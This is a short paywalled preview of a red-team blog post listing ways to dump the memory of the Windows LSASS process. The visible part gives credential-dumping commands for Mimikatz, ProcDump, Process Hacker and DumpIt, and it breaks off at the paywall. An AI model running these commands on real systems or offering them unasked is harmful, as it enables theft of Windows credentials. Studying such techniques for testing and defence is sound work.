RedTeamGuides

RedTeamGuides

50 Methods For Lsass Dump

Reza's avatar
Reza
Jan 26, 2025
∙ Paid
Share

Mimikatz

Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync

ProcDump

Methods: procdump -ma lsass.exe lsass.dmp procdump -accepteula -64 -ma lsass.exe lsass.dmp

Process Hacker

Methods: System->LSASS process->Create Dump

DumpIt

Methods: tasklist /FI "IMAGENAME eq lsass.exe" DumpIt.exe PID output_file_name.bin

Windows Debugging Tools

Methods: wind…

Keep reading with a 7-day free trial

Subscribe to RedTeamGuides to keep reading this post and get 7 days of free access to the full post archives.

Already a paid subscriber? Sign in
© 2025 RedTeamGuides
Privacy ∙ Terms ∙ Collection notice
Start writingGet the app
Substack is the home for great culture